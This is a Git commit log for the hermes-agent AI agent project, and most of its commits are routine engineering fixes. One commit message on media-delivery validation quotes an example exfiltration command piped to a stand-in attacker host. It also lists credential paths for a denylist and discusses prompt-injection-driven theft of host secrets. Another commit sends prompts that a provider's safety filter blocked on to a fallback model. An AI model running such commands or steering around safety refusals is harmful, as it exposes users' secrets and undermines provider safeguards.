hermes-agent

mirror of https://github.com/NousResearch/hermes-agent.git synced 2026-07-14 14:12:44 +00:00

Author	SHA1	Message	Date
Dave Heritage	5a95fb2e14	feat: expose completed-turn message context to memory providers Adds an optional `messages` keyword to the `MemoryProvider.sync_turn` contract so external/community memory plugins can receive the OpenAI-style conversation message list for the completed turn — including assistant tool calls and tool result content — not just the final assistant text. Dispatch uses signature inspection (`_provider_sync_accepts_messages`): only providers that declare a `messages` parameter (or `**kwargs`) receive it; all existing in-tree providers keep their legacy text-only signature and are called unchanged. No structured-trace envelope is added to core — providers reconstruct whatever they need from the standard message list. Also documents Memori as a standalone community memory provider. Salvaged from #28065 — rebased onto current main. Co-authored-by: Dave Heritage <david@memorilabs.ai>	2026-05-29 02:16:43 +05:30
Nicolò Boschi	490b3e76b1	feat(hindsight): default recall_types to observation only Auto-recall used to surface every fact type Hindsight had on the session — `world`, `experience`, and `observation`. That triple-ships the same underlying signal in three different framings: observations are the concrete events the user said/did/asked, while world and experience facts are aggregate summaries Hindsight derives from those exact observations. Including all three burns most of `recall_max_tokens` on rephrasings, crowds out events the model actually needs to see, and produces effective duplicates in the prompt — observations themselves are deduplicated by construction so observation-only recall is denser per token and closer to conversational ground truth. Change ------ - Default `_recall_types = ["observation"]` (was `None`, which delegated to server-side "return everything"). - `initialize()` now treats a missing `recall_types` config the same way; also accepts comma-separated strings for parity with `recall_tags`. - An explicit `recall_types=[]` config falls back to the default rather than disabling the filter (would silently widen recall vs. the new default). - Added to `get_config_schema()` so it's discoverable via `hermes config`. Per-call `hindsight_recall` tool invocations are unaffected — they already only forward `types` when the caller passes the argument. Docs / migration ---------------- plugins/memory/hindsight/README.md grows a "Behavior change" callout explaining the why (no-duplicates, information-efficient) and how to restore the legacy broad recall: "recall_types": "observation,world,experience" # or a JSON list in `~/.hermes/hindsight/config.json`. Tests ----- - `test_default_values` updated for the new default. - New cases: explicit list override, CSV string accepted, empty list falls back to default (not "wider than default").	2026-05-28 13:07:20 -07:00
teknium1	321ce94e25	test: update non-minimax overflow test to match new keep-context behavior The old test asserted that a non-MiniMax provider returning a generic overflow (no provider-reported max) would step down to the 128K probe tier. The salvaged fix from #33673 deliberately removes that step-down because guessed tiers cause configured 1M sessions to silently shrink. Update the test to assert the new contract: keep the configured 200K window and rely on compression instead.	2026-05-28 12:26:53 -07:00
yanghd	7a3c38d0b7	fix: stop probe stepdown without provider context limit	2026-05-28 12:26:53 -07:00
kshitijk4poor	5cbc3fbdcc	fix(cli): /yolo in chat must enable session bypass, not just set env var The CLI's in-chat `/yolo` toggle mutated `os.environ["HERMES_YOLO_MODE"]` but had no effect because `tools/approval.py:_YOLO_MODE_FROZEN` captures that env var once at module-import time (a deliberate security floor that keeps prompt-injected skills from flipping the bypass mid-run). By the time the user reaches `/yolo` in a running CLI session, `tools.approval` has already been imported, so the env flip after that is a silent no-op. Result: `/yolo` advertised "⚠ YOLO" in the status bar while every dangerous command still hit the approval prompt or got denied. Only `hermes --yolo` (set before tool imports), `HERMES_YOLO_MODE=1 hermes ...`, and `hermes config set approvals.mode off` actually bypassed. This patches the CLI to match what the gateway and TUI `/yolo` handlers already do, plus mirrors the TUI's session-rename YOLO transfer: * `_toggle_yolo()` now calls `enable_session_yolo(self.session_id)` / `disable_session_yolo(self.session_id)` instead of touching the env var. Matches `gateway/run.py:_handle_yolo_command` and the `tui_gateway/server.py` key=="yolo" branch. * Around each `run_conversation()` call, `run_agent()` now binds `set_current_session_key(self.session_id)` so `tools.approval.is_current_session_yolo_enabled()` resolves against the same key the toggle writes under, and resets it in `finally` so reused threads don't see stale identity. Matches the `tui_gateway/server.py` and `gateway/platforms/api_server.py` binding pattern. * New `_transfer_session_yolo()` helper carries YOLO bypass state across `self.session_id` reassignments — `/branch` forking into a new session id and the auto-compression sync that rotates into a fresh continuation session id. Without this, the same UX failure mode the rest of this fix addresses (silent `/yolo` no-op) would reappear after a single `/branch` or auto-compression event. Mirrors `tui_gateway/server.py` ~line 1297-1305. * New `_is_session_yolo_active()` helper replaces the two `bool(os.getenv("HERMES_YOLO_MODE"))` reads in the status-bar builders, so the badge reflects the actual bypass state. Uses `getattr(self, "session_id", None)` so status-bar test fixtures that bypass `__init__` via `HermesCLI.__new__(HermesCLI)` don't trip `AttributeError` (the builders swallow exceptions silently and lose every field after the failure). Still honors `_YOLO_MODE_FROZEN` so `hermes --yolo` keeps lighting it up. The `_YOLO_MODE_FROZEN` security freeze is preserved — env-var-based opt-in still only works when set before process start, which is the documented contract for `--yolo` / `HERMES_YOLO_MODE`. Closes #33925	2026-05-28 12:10:21 -07:00
teknium1	f30db14ced	fix(kanban): SIGTERM on worker must terminate the process (#28181 ) The single-query signal handler in cli.py raises KeyboardInterrupt on SIGTERM/SIGHUP. For interactive 'hermes chat -q' that unwinds the main thread cleanly. For kanban workers spawned by the dispatcher, the worker process is likely to have a non-daemon thread alive (terminal _wait_for_process, custom plugins, etc.). With KeyboardInterrupt only the main thread unwinds; the non-daemon thread keeps the process alive, the gateway has already restarted, and the dispatcher's _pid_alive check returns True forever — task stuck in 'running' indefinitely. When HERMES_KANBAN_TASK is set (dispatcher-spawned worker), flush logging + stdout/stderr, then os._exit(0) instead of raising KeyboardInterrupt. The kernel reclaims the PID immediately, and the existing zombie-state detection in _pid_alive flips the task to crashed on the next dispatcher tick. detect_crashed_workers then re-spawns it on the following tick — no manual recovery needed. A SIGALRM(2s) deadman is armed before the flush so a pathological blocking-I/O flush can't wedge the worker forever. In practice the reporter measured flush in <1ms; the alarm is a failsafe, never the common path. Interactive (non-kanban) chat -q is unchanged — the env-gated branch only fires for dispatcher-spawned workers. Live verification on this machine: - Without HERMES_KANBAN_TASK + non-daemon thread alive: process hangs alive 4+ seconds after SIGTERM. Dispatcher's _pid_alive returns True → task stuck. - With HERMES_KANBAN_TASK + same non-daemon thread: process exits in 0.10s via os._exit(0). Dispatcher reclaims on next tick. Tests: - tests/hermes_cli/test_signal_handler_kanban_worker.py (3 cases): end-to-end subprocess test with a non-daemon thread, HERMES_KANBAN_TASK env, SIGTERM, dispatcher-style _pid_alive check. Plus a source-level invariant test catching future refactors that drop the env-gated exit. - 452/452 kanban tests pass. Co-authored-by: andrewhosf <andrewho.sf@gmail.com>	2026-05-28 11:59:58 -07:00
Teknium	3a9bc9d88a	fix(model picker): unify /model and `hermes model` lists, add disk cache (#33867 ) * fix(model picker): unify /model and `hermes model` model lists, add disk cache The /model slash picker and `hermes model` were drifting apart. /model read the raw static `OPENROUTER_MODELS` list (31 entries, including 5 that fail at runtime — no tool-call support or absent from live catalog), while `hermes model` ran the same list through the live OpenRouter /v1/models tool-support filter and showed 26 valid entries. Same problem existed for every other authed provider: /model used curated static lists, `hermes model` used live /v1/models. Unifies both surfaces on `provider_model_ids()` and adds a generic disk-cached wrapper so the picker stays snappy. Changes - hermes_cli/models.py: new `cached_provider_model_ids()` — ~/.hermes/provider_models_cache.json, 1h TTL, per-provider entries keyed by credential fingerprint (env vars + OAuth file mtimes). Stale-data-beats-no-data on transient failures. Pair with `clear_provider_models_cache(provider=None)`. - hermes_cli/models.py: `provider_model_ids("nous")` now falls back to the docs-hosted manifest (not the in-repo snapshot) when the live Portal /models call fails — preserves the model_catalog regression guarantee while still going through the unified pathway. - hermes_cli/model_switch.py: `list_authenticated_providers` routes sections 1, 2, and 2b through `cached_provider_model_ids(slug)` with curated fallback when the live fetcher comes up empty. - hermes_cli/model_switch.py: `parse_model_flags` extended to a 4-tuple, parses `--refresh`. - cli.py / gateway/run.py / tui_gateway/server.py: updated unpacking; CLI + gateway wire `--refresh` to `clear_provider_models_cache()`. - hermes_cli/main.py: `hermes model --refresh` argparse flag. - hermes_cli/commands.py: `/model` args_hint advertises `--refresh`. - tests/hermes_cli/test_inventory.py: refresh stale comment. Live PTY parity verification - /model → OpenRouter row: `(26 models)` (was 31, with broken entries) - `hermes model` → OpenRouter: 26 models (unchanged) - The 5 dropped entries: `pareto-code` (no tool-call support), `gemini-3-pro-image-preview` (no tool-call support), `elephant-alpha`, `hy3-preview:free`, `ring-2.6-1t:free` (gone from OpenRouter's live catalog). Live PTY timing - First /model open, empty cache: 4624 ms (full network round trip across every authed provider) - Second /model open, warm cache: 51 ms (90× faster) - `/model --refresh` clears the disk cache and re-fetches. Cache schema (~/.hermes/provider_models_cache.json, ~3 KB): { "anthropic": {"fp": "<sha256:16>", "at": 1748..., "models": [...]}, ... } Targeted tests: tests/hermes_cli/ + gateway model tests + tui_gateway — 5855/5855 pass. * fix(model picker): use blake2b for cache fingerprint to silence CodeQL py/weak-sensitive-data-hashing flagged the sha256 call in _credential_fingerprint() as a high-severity alert because the input includes env var values whose names contain _API_KEY / _TOKEN. The hash is used solely as a cache-bust identity — never reversed, never stored, collisions are harmless (worst case: cache miss → live re-fetch). blake2b serves the same purpose and isn't flagged by this rule. Functional behavior identical: 16-hex-char digest, cache hit/miss logic unchanged. Live re-verified — 26 OpenRouter models, warm-cache 78ms.	2026-05-28 11:33:16 -07:00
Teknium	5f66c36470	fix(redact): pass web URLs through unchanged (#34029 ) * fix(redact): pass web URLs through unchanged Magic-link checkout URLs, OAuth callbacks the agent is meant to follow, and pre-signed share URLs were getting `?token=*` / `?code=` / `?signature=` blanket-redacted by parameter NAME, which breaks any skill that has to round-trip a URL through history (the model's tool call arguments get sanitized before persistence — the live call fires with the real URL, but the next turn sees ``). Joe Rinaldi Johnson hit this with a checkout-acceleration skill that uses magic links in URLs. Drops three call sites from `redact_sensitive_text`: - `_redact_url_query_params` (was redacting `access_token`, `token`, `api_key`, `code`, `signature`, `key`, `auth`, etc.) - `_redact_url_userinfo` (was redacting `https://user:pass@host`) - `_redact_http_request_target_query_params` (was redacting access-log request targets like `"POST /hook?password=... HTTP/1.1"`) The helpers themselves are kept in the module — still importable by anything that wants to opt in explicitly. Still redacted (unchanged): - Vendor-prefix credential shapes (sk-, ghp_, AKIA, gAAAA, etc.) anywhere they appear, including inside URLs — see the `test_known_prefix_inside_url_still_redacted` case. - JWTs (`eyJ...`) - DB connection-string passwords (`postgres://admin:pw@host`) — these are connection strings, not web URLs the agent navigates to. - Authorization headers, ENV assignments, JSON `apiKey`/`token` fields, Telegram bot tokens, private key blocks, Discord mentions, E.164 phone numbers, and form-urlencoded bodies (request bodies, not URLs). Tests: replaces `TestUrlQueryParamRedaction` + `TestUrlUserinfoRedaction` with `TestWebUrlsNotRedacted`, asserting representative URLs (OAuth callback, magic link, S3 pre-signed, websocket, userinfo, access log) pass through unchanged. Adds positive cases proving the prefix and DB connstr nets still fire. 74 redact tests + 10 browser-exfil + 16 PII redaction tests all pass. test(codex_app_server): drop URL-query assertion from stderr-tail redaction test The test bundled (a) sk-live-* credential-prefix redaction with (b) URL query-param redaction. (a) is still in effect via _PREFIX_RE; (b) was the contract we just removed in the parent commit so the 'querysecret12345' assertion stopped holding. Keep the credential-shape assertion, drop the URL-query one. Send-message tool's local _URL_SECRET_QUERY_RE in tools/send_message_tool.py is independent of agent/redact.py and unchanged — its tests (test_top_level_send_failure_redacts_query_token, test_http_error_redacts_access_token_in_exception_text) still pass.	2026-05-28 11:32:39 -07:00
Teknium	7a8589e782	fix(gateway): default media-delivery validation to denylist-only, restore .md delivery (#34022 ) PR #29523 restricted MEDIA: paths and bare local paths in agent output to files under the Hermes media cache or an operator-allowlisted root, with a 10-minute recency window as a fallback. The intent was to defend against prompt-injection-driven exfiltration of host secrets, but in the default single-user setup the asymmetry doesn't earn its keep: we accept any document type the user uploads inbound (.md, .pdf, .txt, .docx, ...) and the agent already has terminal access — anything that can convince it to emit a MEDIA: tag for /etc/passwd can equally convince it to `cat /etc/passwd \| curl attacker.com`. Practical breakage: agents that produced an .md, .pdf, or other artifact more than ~10 minutes ago, or outside the cache allowlist, showed the user a raw filepath in chat instead of the file. Default flipped to denylist-only: • /etc, /proc, /sys, /dev, /root, /boot, /var/{log,lib,run} • $HOME/{.ssh,.aws,.gnupg,.kube,.docker,.config,.azure,.gcloud} • macOS Library/Keychains • $HERMES_HOME/{.env, auth.json, credentials} The legacy allowlist+recency-window behavior stays available via opt-in: `gateway.strict: true` in config.yaml (or `HERMES_MEDIA_DELIVERY_STRICT=1`). Recommended for public-facing bots where prompt injection from one user shouldn't be able to exfiltrate the host's secrets to that same user. • `gateway/platforms/base.py` — `validate_media_delivery_path()` short-circuits to "return resolved if not under denylist" when strict is off. Strict mode preserves the original cache-then- allowlist-then-recency logic. New `_media_delivery_strict_mode()` reader for `HERMES_MEDIA_DELIVERY_STRICT`. • `hermes_cli/config.py` — `gateway.strict: false` added to DEFAULT_CONFIG; existing keys documented as "only consulted in strict mode." No `_config_version` bump needed (deep-merge picks up the new default for old installs). • `gateway/run.py` — bridges `gateway.strict` → `HERMES_MEDIA_DELIVERY_STRICT` at startup. • `tools/send_message_tool.py` — schema description broadened back to plain "any local path." • Tests — existing strict-path tests pinned to STRICT=1 so they keep exercising the legacy behavior; new `TestMediaDeliveryDefaultMode` with 8 cases covering the public default (stale .md accepted, any extension delivers, credential paths still blocked, strict env-var aliases, filter E2E). Validation: - tests/gateway/test_platform_base.py: 119/119 pass - tests/gateway/test_tts_media_routing.py: 7/7 pass - tests/tools/test_send_message_tool.py: 121/121 pass - tests/hermes_cli/test_kanban_notify.py: 12/12 pass - tests/cron/test_scheduler.py: 120/120 pass - E2E via execute_code with real imports: • stale .md outside allowlist → accepted (default) • same path with STRICT=1 → rejected • $HOME/.ssh/id_rsa → rejected (default) • filter_local_delivery_paths([md, key]) → [md] only • gateway.strict in config.yaml → bridged to env (true=1, false=0)	2026-05-28 11:32:36 -07:00
Teknium	7050c052e3	fix(skills): pull full skills.sh catalog via sitemap (858 → 19,932) (#34025 ) The skills.sh source was returning ~858 unique skills from a hardcoded list of 28 popular keyword searches (each capped at 50 results). The real catalog is ~20k — exposed via sitemap-skills-{1,2}.xml linked from the site's sitemap index. Switch the empty-query path in SkillsShSource.search() to walk the sitemap instead of scraping the homepage's curated featured strip. Falls back to the homepage scrape if the sitemap is unreachable. build_skills_index.crawl_skills_sh() now just calls search("", limit=0) instead of running 28 keyword searches — same result in one HTTP round instead of 28. Also handle a httpx + brotlicffi interaction: the per-skill sitemaps are ~900 KB brotli-compressed and the cffi backend's streaming decode chokes on them. Forcing Accept-Encoding to gzip dodges the bug without requiring a brotli library upgrade. E2E against live skills.sh: 19,932 unique skills walked in 0.7s. Tests: 137 pass (+1 new regression test exercising the sitemap path). Floor for skills.sh raised 100 → 10,000 in EXPECTED_FLOORS so a future regression hard-fails the build.	2026-05-28 11:28:12 -07:00
kshitij	1a74795735	feat: add claude-opus-4.8 and claude-opus-4.8-fast (#34003 ) Anthropic released Claude Opus 4.8 on 2026-05-27, available on OpenRouter, Anthropic, Amazon Bedrock, and Claude Platform on AWS: - https://openrouter.ai/anthropic/claude-opus-4.8 - https://openrouter.ai/anthropic/claude-opus-4.8-fast The fast-mode variant is a separate model ID (anthropic/claude-opus-4.8-fast) priced at 2x of the base model — a notable improvement over the 6x premium on older Opus generations (4.6/4.7). It is NOT a `speed: "fast"` request parameter like Opus 4.6; Anthropic's native fast-mode beta still only covers Opus 4.6. Changes: hermes_cli/models.py - Add anthropic/claude-opus-4.8 + anthropic/claude-opus-4.8-fast to the OpenRouter fallback snapshot and the Nous Portal curated list (live catalogs surface them automatically when reachable; the fallback list matters when the manifest fetch fails). - Add claude-opus-4-8 to the Anthropic-native picker list. agent/model_metadata.py - Register claude-opus-4-8 / claude-opus-4.8 in DEFAULT_CONTEXT_LENGTHS with 1M tokens (matches 4.6/4.7). agent/anthropic_adapter.py - Extend _XHIGH_EFFORT_SUBSTRINGS, _ADAPTIVE_THINKING_SUBSTRINGS, and _NO_SAMPLING_PARAMS_SUBSTRINGS with "4-8"/"4.8". 4.8 inherits the Opus 4.7 API contract: adaptive thinking only, xhigh effort level supported, sampling parameters (temperature/top_p/top_k) return 400. - Add claude-opus-4-8 to _ANTHROPIC_OUTPUT_LIMITS (128k max output, same as 4.7). Matches by substring so claude-opus-4-8-fast and date-stamped variants resolve correctly. agent/usage_pricing.py - Add anthropic/claude-opus-4-8: $5/$25 per MTok input/output, $0.50 cache read, $6.25 cache write (same as 4.6/4.7). - Add anthropic/claude-opus-4-8-fast: $10/$50 per MTok (2x), $1.00 cache read, $12.50 cache write. Per OpenRouter, the 2x premium is the only differentiator from regular Opus 4.8. - OpenRouter routes still pull pricing from the live /models API, so no static OpenRouter entry is needed. tests/agent/test_model_metadata.py - Extend the Claude 4.6+ context-length tag list with 4.8/4-8. website/static/api/model-catalog.json - Regenerated via `python scripts/build_model_catalog.py` to pick up the new entries in the OpenRouter and Nous Portal fallback lists. E2E verification (isolated sys.path import against the worktree): - _supports_adaptive_thinking, _supports_xhigh_effort, _forbids_sampling_params all return True for claude-opus-4.8 and claude-opus-4.8-fast. - _supports_fast_mode (the `speed: "fast"` request-parameter gate) stays False for 4.8 — fast mode is a separate model ID on OpenRouter, not a parameter Anthropic accepts on the base model. - DEFAULT_CONTEXT_LENGTHS resolves 1M for both notations. - resolve_billing_route + _lookup_official_docs_pricing resolve the correct $5/$25 (regular) and $10/$50 (fast) pricing for both dot-notation and dash-notation inputs. - 4.7 and 4.6 regression: behavior unchanged. Unit tests: 305 passed across tests/agent/test_usage_pricing.py, test_model_metadata.py, tests/hermes_cli/test_model_catalog.py, test_models.py, test_model_validation.py, test_models_dev_preferred_merge.py.	2026-05-28 10:31:59 -07:00
Ben Heidorn	e8b9369a9d	feat(openrouter): pass session_id in extra_body for sticky routing OpenRouter supports a session_id field in extra_body that pins multi-turn conversations to the same provider endpoint, enabling prompt cache reuse across turns. The session_id was already threaded through to build_extra_body() but never included in the returned dict. Co-Authored-By: Claude Opus 4 (1M context) <noreply@anthropic.com>	2026-05-28 08:52:19 -07:00
kshitij	0554ef1aa3	fix(agent): fallback immediately on provider content-policy blocks (#33883 ) * fix(agent): fallback immediately on provider content-policy blocks Provider safety-filter refusals (e.g. OpenAI Codex 'flagged for possible cybersecurity risk', OpenAI moderation 'violates our usage policies', Anthropic safety-system rejections, Azure content_filter) are deterministic decisions about a specific prompt. Retrying the same prompt up to api_max_retries times just reproduces the same refusal and burns paid attempts before surfacing the generic 'API failed after 3 retries — <provider message>' to Telegram / cron with no indication that the failure came from the model provider rather than Hermes itself. Classify these as a new FailoverReason.content_policy_blocked (non-retryable, should_fallback=True) and route them through the existing is_client_error path so the loop: - skips the 3x retry backoff - activates a configured fallback model immediately - emits a clear provider-safety message to the user (not the generic 'Non-retryable error (HTTP None)') and surfaces actionable guidance when no fallback is configured (rephrase, narrow context, or set fallback_model in hermes config) - returns a final_response that explicitly tells the user this came from the model provider, so gateway delivery is unambiguous and cron last_status reflects the safety block rather than a vague 'agent reported failure' Patterns are intentionally narrow — verbatim refusal phrasings keyed to specific provider safety pipelines, not generic words like 'policy' or 'violation' that would collide with billing / format / auth errors. Regression guards in test_18028_content_policy_blocked.py verify billing 402s, generic 400s, and OpenRouter account-level provider_policy_blocked remain distinct classifications. Salvaged from #18164 onto current main (file restructure: loop logic moved from run_agent.py to agent/conversation_loop.py, _emit_status → _buffer_status), broadened patterns beyond the original OpenAI Codex cybersecurity case to cover OpenAI moderation, Anthropic safety system, and Azure content_filter; added user-actionable guidance and a clear final_response so cron/gateway surfaces the policy block instead of a generic non-retryable error, and added a regression-guard test module mirroring the is_client_error predicate. Addresses #18028. Co-authored-by: Kuan-Chieh Huang <kchuang1015@users.noreply.github.com> * chore: add kchuang1015 to AUTHOR_MAP --------- Co-authored-by: Kuan-Chieh Huang <kchuang1015@users.noreply.github.com>	2026-05-28 07:28:24 -07:00
kshitij	a82c88bac0	fix(xai-oauth): accept bare-code manual paste (state=None) (#26923 ) (#33880 ) xAI's consent page renders the authorization code in-page rather than redirecting through the 127.0.0.1 callback, so on remote/headless setups (GCP Cloud Shell, Codespaces, container consoles, headless VPS) the only value the user can paste is the opaque code with no `code=`/`state=` query parameters. `_parse_pasted_callback` correctly returns `state=None` for that input, but `_xai_oauth_loopback_login` then validated state unconditionally and raised `xai_state_mismatch`, making the documented bare-code paste path unreachable. PKCE (code_verifier) still binds the token exchange to this client, so the local state-equality check is redundant when there is no state to compare. On the manual-paste path only, substitute the locally generated state when the callback returned none — the rest of the validation chain (code presence, error field, token exchange) is unchanged. The loopback HTTP-server path still requires a matching state (a real browser redirect always carries one). Also: clarify the manual-paste prompt to mention xAI's in-page code rendering so users know pasting the bare code on its own is expected. Root-cause analysis from #26923 comment by @AccursedGalaxy (2026-05-20). Tests ----- * test_xai_loopback_login_manual_paste_bare_code_succeeds — positive end-to-end through the token exchange with state=None. * test_xai_loopback_login_loopback_path_rejects_missing_state — the HTTP-server path still rejects state=None as a regression guard (the bare-code relaxation must NOT widen the loopback path). * Existing test_xai_loopback_login_manual_paste_state_mismatch_raises continues to verify wrong (non-None) state is rejected on manual-paste. Closes #26923.	2026-05-28 05:47:30 -07:00
Teknium	67011cc0d7	feat(agent): buffer retry/fallback status, surface only on terminal failure (#33816 ) Users report that the CLI/gateway floods them with confusing retry chatter during transient failures: a single 429 can produce 10+ "Provider/Endpoint/ Retrying in 5s..." lines before the request eventually succeeds. The same firehose hits Telegram, Discord, Slack, etc. via _emit_status. This patch defers all retry/fallback/compression status messages until we know the outcome: - if the turn ultimately succeeds (any path: primary recovers, fallback activates, compression unsticks the request), the buffer is silently dropped — the user sees nothing. - if every retry and fallback exhausts and the turn fails, the buffer is flushed at the terminal-failure return so the user sees the full retry trace alongside the final error. Backend logging (agent.log) is unchanged — every emission site still writes to logger.warning/info, so post-mortem diagnosis is intact. ## What changed run_agent.py: four new methods on AIAgent: _buffer_status(msg) — defer an _emit_status call _buffer_vprint(msg) — defer a _vprint(force=True) line _clear_status_buffer() — drop pending messages on success _flush_status_buffer() — replay pending messages on terminal failure agent/conversation_loop.py: - converted ~30 mid-process emit/vprint sites in the retry, fallback, compression, empty-response, and stream-watchdog paths to the buffered helpers - added _flush_status_buffer() at every terminal-failure return so users still see the trace when it actually matters - added _clear_status_buffer() at the "non-empty assistant content" point (NOT at "API call returned bytes" — empty responses still loop through the empty-retry path and would otherwise lose their trace between iterations) - silenced the two "(´;ω;`) oops, retrying..." / "(╥_╥) error, retrying..." spinner final-frame messages — the spinner now stops cleanly so retries leave no visible residue agent/chat_completion_helpers.py: same conversion for codex TTFB / stale- stream / fallback-activation status messages. agent/stream_diag.py: _emit_stream_drop now buffers instead of emitting directly. ## Tests tests/run_agent/test_retry_status_buffer.py: 7 unit tests covering accumulate→flush, clear-on-success, mixed kinds, empty-buffer no-op, re-buffer after flush, exception swallowing. Updated 3 existing tests that mocked _emit_status to also mock (or use) _buffer_status: - tests/run_agent/test_run_agent.py::test_empty_response_emits_status_for_gateway - tests/run_agent/test_stream_drop_logging.py (2 tests) - tests/agent/test_codex_ttfb_watchdog.py (TTFB hint test) ## Validation Live test: hermes chat -q against an unreachable endpoint with no fallback exhausts retries and prints the full trace at the end. Same flow against a working endpoint prints zero retry chatter.	2026-05-28 04:53:27 -07:00
Teknium	e0572a6def	fix(skills-hub): stop ellipsis-truncating the Identifier column (#33810 ) `hermes skills search` rendered the Identifier column with the default overflow behaviour, so long slugs (notably browse-sh — every browse-sh skill ends in a `-XXXXXX` hash that's part of the identifier) were cut to `browse-sh/weathe…`. Users copied the visible string into `hermes skills install` and got a not-found error because the hash was gone. Set overflow="fold" on the Identifier column in both search tables (`do_search` and the `_resolve_short_name` multi-match table) so long slugs wrap onto a second line instead of getting eaten. Also add a `--json` flag to `hermes skills search` (and the `/skills search` slash variant) for scripting — emits a list of {name, identifier, source, trust_level, description} objects with the full identifier, which is the right shape for copy-paste pipelines too. Closes #33674.	2026-05-28 04:53:13 -07:00
Teknium	5e1f793430	chore(web): remove web_crawl tool + provider crawl plumbing (#33824 ) The web_crawl_tool() function was an orphan — no model schema registered it, no skill or CLI command called it, and the agent had no way to invoke it. PR #32608 proposed wiring it up as a model-callable tool; we've decided not to expose crawl as a separate capability since web_search + web_extract cover the use cases we want models to have. Removed: - tools/web_tools.py: web_crawl_tool() (~230 LOC) - plugins/web/firecrawl/provider.py: supports_crawl() + crawl() - plugins/web/tavily/provider.py: supports_crawl() + crawl() - plugins/web/xai/provider.py: supports_crawl() override - agent/web_search_provider.py: supports_crawl() + crawl() ABC methods - agent/web_search_registry.py: get_active_crawl_provider() + the 'crawl' branch in _resolve() - agent/display.py: web_crawl tool-progress rendering - hermes_cli/config.py: 'web_crawl' from TAVILY_API_KEY.tools - tools/website_policy.py: stale comment reference - Tests: removed TestWebCrawlTavily class, the two website-policy web_crawl tests, the searxng/ddgs/brave-free crawl-error tests, the integration test_web_crawl method, and the test_unconfigured_crawl_emits_top_level_error test. Trimmed the capability-flag parametrize list and the WebSearchProvider ABC conformance tests. - Docs: trimmed the Crawl column from capability tables in both EN and zh-Hans, updated the developer-guide ABC table. Net: 25 files, +115/-1067. Closes #33762 (the schema-text bug only existed if #32608 landed). Supersedes #32608.	2026-05-28 04:52:42 -07:00
teknium1	b243afb68b	fix(discord): skip backfill for auto-created threads and update test fakes When auto-threading kicked in, the broadened backfill gate ran on the freshly-created thread — but the thread has no prior context to fetch, and the parent-channel reference passed to _fetch_channel_context would have leaked unrelated context (see #31467). Skip backfill when auto_threaded_channel is set. Also teach the _FakeTextChannel / _FakeThreadChannel test doubles to expose a no-op history() async generator so the broadened gate doesn't trip AttributeError → discord.Forbidden (MagicMock) → TypeError in the existing auto-thread tests. Add a regression test that asserts auto-threaded messages do not trigger backfill.	2026-05-28 04:52:02 -07:00
Pluviobyte	eafe11d456	fix(gateway): backfill Discord thread context Discord threads where the bot has already participated bypass mention gating by default, but the backfill check was still tied to the mention-needed condition. That meant follow-up thread messages could trigger a response without providing recent thread history to the session. Run history backfill for thread messages whenever backfill is enabled, while keeping DMs skipped and channel mention backfill behavior unchanged. Add a regression test for a known thread follow-up without an explicit mention. Fixes #33666 Co-authored-by: Cursor <cursoragent@cursor.com>	2026-05-28 04:52:02 -07:00
teknium1	6f9182cb34	fix(kanban): content-addressed corrupt-DB backup filename Repeated quarantines of an unchanged corrupt kanban.db used to amplify disk usage by N: the gateway dispatcher's 5-minute retry loop, multi- profile fleets sharing one DB, and manual reopen attempts each produced a fresh '.corrupt.<timestamp>.bak' copy of the same bytes. After 10 retries on a 100KB DB you had 11x the disk footprint of duplicate corrupt data. Derive the backup filename from a sha256 of the main DB instead of a timestamp + collision counter. Same bytes → same filename → skip the copy on retries. Different bytes (partial repair, further damage) → different filename → preserve separately. Sidecar (-wal/-shm) backups inherit the same content-addressed name. Inspired by @hanzckernel's PR #33529, simplified down to ~30 LOC: drop the persistent JSON marker file, drop the atomic temp+fsync+rename helper (shutil.copy2 is fine for a quarantine-only path), drop the gateway-side WAL/SHM fingerprint extension (the existing (path, mtime, size) tuple still gives the 5-minute retry semantics it needs), and drop the gateway-side helper extraction. The backup file existing IS the marker; no separate state needed. Test: tests/hermes_cli/test_kanban_db.py::test_repeated_corrupt_open_reuses_single_backup proves 10 retries on the same corrupt bytes produce 1 backup (was 11), and mutating the corrupt bytes produces a second backup with a different fingerprint. Refs #33529 Co-authored-by: hanzckernel <zhicheng.han@mathematik.uni-goettingen.de>	2026-05-28 03:38:09 -07:00
Teknium	432a691758	fix(update): stream + idle-kill `npm run build` so a stalled webui-build can't soft-brick the install (#33803 ) `hermes update` ran the webui build with `capture_output=True` and no timeout. On low-memory hosts (WSL2's 4 GB default, small VPSes, antivirus stalls) Vite goes silent for minutes; users see a frozen terminal, decide the update is hung, and reboot. The reboot lands after `pip install -e .` has already touched the install but before the build completes, leaving the `hermes` launcher in place while `hermes_cli` is no longer importable — i.e. `ModuleNotFoundError: No module named 'hermes_cli'` (#33788, same class as #32384). Changes: - New `_run_with_idle_timeout()` helper: streams subprocess output line-by-line (so the user sees Vite progress in real time) and kills the process if no bytes appear on stdout/stderr for 180s. The existing stale-dist fallback (#23817) then serves the previous build instead of failing the update. - `_build_web_ui()` uses the helper for `npm run build` (the actual stall site). `npm install` keeps `subprocess.run` + capture_output to preserve the existing EPERM-retry-on-Windows contract. - Both `cmd_update` call sites print `→ Core update complete. Building dashboard (optional)...` before the webui build. The CLI is fully functional at this point; a webui-build failure only affects `hermes dashboard`. Telegraphing the boundary explicitly stops users from rebooting through the build step. Tests: - `tests/hermes_cli/test_run_with_idle_timeout.py` — 4 tests covering streaming success, nonzero exit, idle-kill, and missing-binary cases. Uses real `subprocess.Popen` on tiny Python scripts; isolated in its own file so per-file canonical-runner parallelism doesn't pair it with the mock-heavy tests. - `tests/hermes_cli/test_web_ui_build.py` — updated existing tests to patch `_run_with_idle_timeout` for the build step in addition to `subprocess.run` for the install step. - `tests/hermes_cli/test_cmd_update.py::test_update_refreshes_repo_and_tui_node_dependencies` — same update. Full suite: `scripts/run_tests.sh tests/hermes_cli/` → 5646 passed, 0 failed. Fixes #33788.	2026-05-28 03:34:47 -07:00
